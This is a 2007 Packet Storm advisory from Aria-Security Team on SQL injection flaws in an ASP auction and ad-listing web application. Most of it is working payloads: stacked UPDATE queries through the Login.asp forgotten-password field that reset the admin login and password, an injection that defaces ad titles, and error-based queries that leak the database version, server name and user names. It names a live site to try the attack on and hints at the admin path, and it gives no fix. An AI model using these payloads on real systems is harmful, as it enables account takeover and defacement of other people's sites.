nahc-sql.txt

2007-11-27T00:00:00
ID PACKETSTORM:61223
Type packetstorm
Reporter aria-security.net
Modified 2007-11-27T00:00:00

Description

                                        
                                            `Aria-Security Team  
http://Aria-Security.Net  
------------------------------------------  
Original Advisory @ http://aria-security.net/forum/showthread.php?p=1111  
Try it online @ http://ads.netauctionhelp.com  
  
  
needed tables:  
  
tblMember.id  
tblMember.login  
tblMember.pswd  
  
Vulnarable Page: Login.asp  
Run this query for Forget Password  
-1' UPDATE tblMember Set login= 'admin' where(id='1');--  
-1' UPDATE tblMember set pswd= 'hacked' Where(id= '1');--  
  
  
there it is, admin with the password hacked  
  
------------------------------------------------------------------------------------  
these may help the attacker to get more info in the search.asp page  
  
/search.asp?sort=ni&category=&categoryname=&kwsearc h=&nsearch=[SQL Injection]  
  
  
tblAd.id,tblAd.imagepath,tblAd.aspectratio,tblAd.t itle,tblAd.zip,tblAd.state,tblAd.startdate'  
  
  
example: -1' update tblAd set title= 'hacked' where(id='1');--  
site.com/addetl.asp?id=1 will say HACKED.  
  
1' or 1=convert(int,@@version)--  
1' or 1=convert(int,@@servername)--  
1' or 1=convert(int,db_name())--  
1' or 1=convert(int,user_name())--  
1' or 1=convert(int,system_user)--  
  
  
hint: /auctionAdmin/admLogin.asp ;)  
  
  
Greetz: AurA  
Credits goes to Aria-Security Team  
Regards,  
The-0utl4w  
  
  
  
`